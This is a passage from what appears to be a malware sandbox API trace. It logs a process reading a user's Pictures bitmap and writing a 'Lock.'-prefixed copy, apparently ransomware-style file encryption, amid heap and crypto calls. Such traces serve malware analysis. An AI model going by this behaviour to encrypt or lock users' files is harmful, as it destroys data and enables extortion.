wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.592] CryptDestroyHash (hHash=0x9e2078) returned 1 [0208.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/5aASoDBkD4Ug.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5aasodbkd4ug.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.593] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.593] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.593] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0208.594] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.5aASoDBkD4Ug.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.5aasodbkd4ug.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.597] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.597] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0208.599] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x7ec3, lpOverlapped=0x0) returned 1 [0208.600] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0208.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17ec3) returned 0x2aae878 [0208.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ed020 | out: hHeap=0x2af0000) returned 1 [0208.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17ec3) returned 0x2ac6748 [0208.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.608] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17ec3) returned 0x2aae878 [0208.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0208.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0208.609] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0208.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17ec3) returned 0x2aae878 [0208.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0208.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0208.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17ec3) returned 0x37c0048 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0208.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.615] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.616] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0208.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0208.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0208.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.619] 